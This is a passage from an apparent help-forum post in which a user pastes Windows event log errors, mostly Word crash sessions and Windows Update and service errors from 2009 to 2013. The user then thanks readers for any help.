Error - 02.06.2013 11:12:37 | Computer Name = ant-PC | Source = WinMgmt | ID = 10
Description =
[ OSession Events ]
Error - 05.05.2010 04:27:04 | Computer Name = ant-PC | Source = Microsoft Office 12 Sessions | ID = 7001
Description = ID: 0, Application Name: Microsoft Office Word, Application Version:
12.0.6514.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 11368
seconds with 1020 seconds of active time. This session ended with a crash.
Error - 15.06.2012 05:27:36 | Computer Name = ant-PC | Source = Microsoft Office 12 Sessions | ID = 7001
Description = ID: 0, Application Name: Microsoft Office Word, Application Version:
12.0.6661.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 10
seconds with 0 seconds of active time. This session ended with a crash.
Error - 11.09.2012 10:42:12 | Computer Name = ant-PC | Source = Microsoft Office 12 Sessions | ID = 7001
Description = ID: 0, Application Name: Microsoft Office Word, Application Version:
12.0.6661.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 1055
seconds with 960 seconds of active time. This session ended with a crash.
Error - 11.09.2012 11:20:17 | Computer Name = ant-PC | Source = Microsoft Office 12 Sessions | ID = 7001
Description = ID: 0, Application Name: Microsoft Office Word, Application Version:
12.0.6661.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 2260
seconds with 1500 seconds of active time. This session ended with a crash.
Error - 11.03.2013 09:29:25 | Computer Name = ant-PC | Source = Microsoft Office 12 Sessions | ID = 7001
Description = ID: 0, Application Name: Microsoft Office Word, Application Version:
12.0.6668.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 3508
seconds with 2040 seconds of active time. This session ended with a crash.
[ System Events ]
Error - 14.08.2009 16:07:32 | Computer Name = ant-PC | Source = Microsoft-Windows-WindowsUpdateClient | ID = 20
Description =
Error - 15.08.2009 13:08:09 | Computer Name = ant-PC | Source = HTTP | ID = 15016
Description =
Error - 15.08.2009 13:09:04 | Computer Name = ant-PC | Source = Service Control Manager | ID = 7000
Description =
Error - 15.08.2009 13:13:45 | Computer Name = ant-PC | Source = Microsoft-Windows-WindowsUpdateClient | ID = 20
Description =
Error - 15.08.2009 19:24:03 | Computer Name = ant-PC | Source = Microsoft-Windows-WindowsUpdateClient | ID = 20
Description =
Error - 16.08.2009 15:56:43 | Computer Name = ant-PC | Source = HTTP | ID = 15016
Description =
Error - 16.08.2009 15:57:10 | Computer Name = ant-PC | Source = Service Control Manager | ID = 7000
Description =
Error - 16.08.2009 18:05:00 | Computer Name = ant-PC | Source = Microsoft-Windows-WindowsUpdateClient | ID = 20
Description =
Error - 17.08.2009 03:11:20 | Computer Name = ant-PC | Source = HTTP | ID = 15016
Description =
Error - 17.08.2009 03:11:42 | Computer Name = ant-PC | Source = Service Control Manager | ID = 7000
Description =
< End of report >
I hope that is all the data you need and that I haven't posted too much of it... Thanks in advance for every reply or bit of help!